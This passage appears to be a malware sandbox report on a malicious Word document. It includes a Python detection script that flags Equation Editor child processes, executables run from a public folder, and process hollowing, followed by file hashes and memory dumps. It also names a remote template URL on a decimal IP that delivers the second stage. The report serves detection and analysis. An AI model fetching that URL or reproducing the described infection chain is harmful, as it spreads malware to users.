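    {"pid": 1756, "ppid": 924, "image": VBC, "cmdline": '"%s"' % VBC},
    {"pid": 1832, "ppid": 1756, "image": VBC, "cmdline": '"%s"' % VBC},
    {"pid": 1812, "ppid": 1756, "image": VBC, "cmdline": '"%s"' % VBC},
    {"pid": 1828, "ppid": 1756, "image": VBC, "cmdline": '"%s"' % VBC},
    {"pid": 1892, "ppid": 1756, "image": VBC, "cmdline": '"%s"' % VBC},
    {"pid": 1612, "ppid": 1756, "image": VBC, "cmdline": '"%s"' % VBC},
]

# Constructed from the WriteProcessMemory and SetThreadContext signatures.
API_EVENTS = [
    {"api": "WriteProcessMemory", "pid": 924, "target": 1756},
    {"api": "WriteProcessMemory", "pid": 2016, "target": 1616},
    {"api": "WriteProcessMemory", "pid": 1756, "target": 1612},
    {"api": "SetThreadContext", "pid": 1756, "target": 1612},
]


def image_name(path: str) -> str:
    """Upper-cased file name of a Windows image path (ntpath works on any host)."""
    return ntpath.basename(path).upper()


def ancestors(proc, by_pid):
    """Yield parent, grandparent, ... until the chain leaves the event set."""
    seen = set()
    parent = by_pid.get(proc["ppid"])
    while parent is not None and parent["pid"] not in seen:
        seen.add(parent["pid"])
        yield parent
        parent = by_pid.get(parent["ppid"])


def detect(procs, api_events):
    """Return (rule, pid) findings for the three rules described in the lead-in."""
    by_pid = {p["pid"]: p for p in procs}
    findings = []
    for p in procs:
        parent = by_pid.get(p["ppid"])
        # Rule 1: Equation Editor has no business creating processes.
        if parent is not None and image_name(parent["image"]) == "EQNEDT32.EXE":
            findings.append(("eqnedt_child_process", p["pid"]))
        # Rule 2: executable in a world-writable directory under an Office chain.
        in_public = p["image"].lower().startswith("c:\\users\\public\\")
        if in_public and any(image_name(a["image"]) in OFFICE_IMAGES for a in ancestors(p, by_pid)):
            findings.append(("public_dir_exec_from_office_chain", p["pid"]))

    # Rule 3: same parent->child pair seen with both APIs and the same image on both sides.
    pairs = {}
    for e in api_events:
        pairs.setdefault((e["pid"], e["target"]), set()).add(e["api"])
    for (writer, target), apis in pairs.items():
        if {"WriteProcessMemory", "SetThreadContext"} <= apis:
            w, t = by_pid.get(writer), by_pid.get(target)
            if w and t and t["ppid"] == writer and image_name(w["image"]) == image_name(t["image"]):
                findings.append(("process_hollowing_same_image", target))
    return findings


if __name__ == "__main__":
    for rule, pid in detect(PROCESS_EVENTS, API_EVENTS):
        print("%-36s pid=%d" % (rule, pid))
```

On these records the first rule fires once (EQNEDT32.EXE starting PID 1756), the second fires for all six vbc.exe processes, and the third fires only for 1612; the WINWORD.EXE to splwow64.exe writes are correctly ignored because no SetThreadContext accompanies them. Feeding real Sysmon event IDs 1, 8 and 10 into the same shape is the only change needed for production use.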
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{FB18CB5E-E65C-47E2-A617-3285658E63B3}.FSD (Word working file)
  Filesize: 128KB
  MD5: 9a70af619a8080c02ce54f610fd1b5bb
  SHA1: dcb24cba40ba306fbdb8716ea94c6300f6901d1b
  SHA256: fc6721ed809b91b21b5c7013591aa090c99e6dd27901be87d3e0ab4ee181f3d0
  SHA512: faca554477336bf0a17528215e0b063ed4e34c79b28425201a5f532462852da98c63b6f73ea59a6913336690cc506665ea27da5aa30c3aac5103e10e66cbc347

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (Word working file)
  Filesize: 128KB
  MD5: 6278d74fd51e9b07f006c296e8cf40a6
  SHA1: 5be082522a0b01a8369659f04d9f1a6dcbf6d38a
  SHA256: 90598574e4634262a2b438f7c99aac7188a83f06470088db40f29a98add0601f
  SHA512: 9f8ff6a0e4a4d88a0743f5da24b0f99d87afafdb38180611f27f278ccba7d5acacd47e1040d007e5128168048e548d822672def64af0f4d5fe801110cd9c02d4

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TOS3MI7U\OO-OO-OO[1].doc (WinINet cache copy of the remote template fetched from http://3235029245/OO-OO-OO.DOC; the second stage that launches Equation Editor)
  Filesize: 13KB
  MD5: 12592e047d6a24925a0f71e84618c828
  SHA1: d808fc6c513b301f65ff83ca258ed83d04bc3ce0
  SHA256: 8952a605589e5137455aa1b31c6d3be650f920dc090e82e090e3951e249d6acc
  SHA512: 3e598a3f6783c46ae4f71aa3c07a3519a2a71522607063390618faede79235a0c7070b49b2ba9a8de92c0770beb2ece2c769f6d8983b64ccaddca073557d6192

C:\Users\Admin\AppData\Local\Temp\{D26A27C0-A766-44F9-96B0-CC2BF6ADCAC7} (Word working file)
  Filesize: 128KB
  MD5: 735e9bc0fa888919616b58475a8a1bf2
  SHA1: 18eb1fdf65135a246a554f478b1b68cfa4702396
  SHA256: 58bd2cdc46a54bb79b65df20f9680fe424a6ca5b8a6c3417f29f54dfc950d611
  SHA512: 2d01abaf2099c7939c96907c514c95ed4225fa5b4ea252aaa307a83634bf362f3a9133dc39c0bd91b7eece89bd6ce1f5db5fbc259e1d7e13d2c358da69ceeb26

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm (Word's default template)
  Filesize: 20KB
  MD5: e8e662a0a48ea03170d1fd4e8a9dd848
  SHA1: eb8f97e4f1cd06ce07596fc8e5a17f67d42d2dea
  SHA256: 84d452418b9cd212f2249860faf5b250662820c22f33fb27a5268356a09a7a38
  SHA512: a209fd98c67f930b14ca12ea177494a1cbba5bc0ba18778567f43791bb2dee0090c1d3fdb8e88f64810464b59bb1ffcc9d02474914ab39bf0bd0a989d56d3371

C:\Users\Public\vbc.exe (8 entries) and \Users\Public\vbc.exe (5 entries); the dropped executable run by EQNEDT32.EXE, all entries carry identical hashes
  Filesize: 847KB
  MD5: 04c980db0dbdf3b2a2b93e02a1797754
  SHA1: 49046b40bba2937ff84dce8a63d8793279a64c43
  SHA256: bf53b54b9edea2783c305fa6d1fd87e298b4d4506c587068dd6e6dd268c80424
  SHA512: 54cdc011152815d8950a832add0448927d25450d38cd1d079ebf8936d2229a9d4c757b88b4871ccfaa8c23f7708c3fe6f3f7b2ece9eae75c4820786e5af125db

Memory dumps (region | size)
  memory/1612-172-0x0000000000400000-0x00000000004A2000-memory.dmp | 648KB
  memory/1612-173-0x0000000000400000-0x00000000004A2000-memory.dmp | 648KB
  memory/1612-184-0x0000000000400000-0x00000000004A2000-memory.dmp | 648KB
  memory/1612-179-0x0000000000400000-0x00000000004A2000-memory.dmp | 648KB
  memory/1612-178-0x0000000000400000-0x00000000004A2000-memory.dmp | 648KB
  memory/1612-175-0x0000000000400000-0x00000000004A2000-memory.dmp | 648KB
  memory/1612-169-0x0000000000400000-0x00000000004A2000-memory.dmp | 648KB
  memory/1612-170-0x0000000000400000-0x00000000004A2000-memory.dmp | 648KB
  memory/1612-171-0x0000000000400000-0x00000000004A2000-memory.dmp | 648KB
  memory/1612-174-0x000000007EFDE000-0x000000007EFDF000-memory.dmp | 4KB
  memory/1756-155-0x00000000003E0000-0x00000000003F6000-memory.dmp | 88KB
  memory/1756-156-0x0000000004DD0000-0x0000000004E10000-memory.dmp | 256KB
  memory/1756-164-0x0000000000720000-0x0000000000742000-memory.dmp | 136KB
  memory/1756-161-0x0000000004DD0000-0x0000000004E10000-memory.dmp | 256KB
  memory/1756-162-0x0000000000570000-0x000000000057C000-memory.dmp | 48KB
  memory/1756-163-0x00000000077F0000-0x0000000007898000-memory.dmp | 672KB
  memory/1756-153-0x0000000000110000-0x00000000001EA000-memory.dmp | 872KB
  memory/2016-54-0x000000005FFF0000-0x0000000060000000-memory.dmp | 64KB
  memory/2016-211-0x000000005FFF0000-0x0000000060000000-memory.dmp | 64KB